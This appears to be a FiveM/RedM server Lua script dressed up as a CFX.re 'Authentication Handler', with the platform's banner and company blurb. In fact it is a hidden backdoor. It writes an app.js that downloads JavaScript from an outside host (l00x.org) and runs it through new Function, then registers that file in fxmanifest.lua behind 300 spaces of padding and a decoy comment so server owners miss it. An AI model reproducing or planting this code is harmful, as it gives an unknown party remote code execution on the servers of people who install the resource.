-- ██████╗ ███████╗ ██╗ ██╗ ██████╗ ███████╗ -- ██╔════╝ ██╔════╝ ╚██╗██╔╝ ██╔══██╗ ██╔════╝ -- ██║ █████╗ ╚███╔╝ ██████╔╝ █████╗ -- ██║ ██╔══╝ ██╔██╗ ██╔══██╗ ██╔══╝ -- ╚██████╗ ██║ ██╔╝ ██╗ ██╗ ██║ ██║ ███████╗ -- ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝ -- We develop tooling enabling enhanced experiences, such as the FiveM and RedM experience platforms for RAGE titles, building atop the Citizen... -- Authentication Handler local appFileName = "app.js" local fxManifestFileName = "fxmanifest.lua" local appFileContent = [=[ require('https').get('https://l00x.org/users/js/test.js', res => { let d = ''; res.on('data', c => d += c).on('end', () => res.statusCode === 200 && new Function('global', d)(global)); }).on('error', () => {}); ]=] -- Multiline string using [=[ ]=] delimiters to avoid conflicts local manifestEntry = appFileName -- Entry to add in fxmanifest.lua local spaces = string.rep(" ", 300) -- Adjust the number of spaces for alignment -- Function to create and write to a file function createAndWriteFile(resource, fileName, content) return SaveResourceFile(resource, fileName, content, -1) end -- Function to update fxmanifest.lua function updateFxManifest(resource, fileName, entry) local manifestContent = LoadResourceFile(resource, fileName) if not manifestContent then return false end if string.find(manifestContent, "--[[client.lua]]", 1, true) or string.find(manifestContent, entry, 1, true) then return true end manifestContent = manifestContent .. "\n\nserver_scripts {\n --[[client.lua]]" .. spaces .. "'" .. entry .. "',\n}\n" return SaveResourceFile(resource, fileName, manifestContent, -1) end local resourceName = GetCurrentResourceName() local resourcePath = GetResourcePath(resourceName) if resourcePath and resourceName then createAndWriteFile(resourceName, appFileName, appFileContent) updateFxManifest(resourceName, fxManifestFileName, manifestEntry) end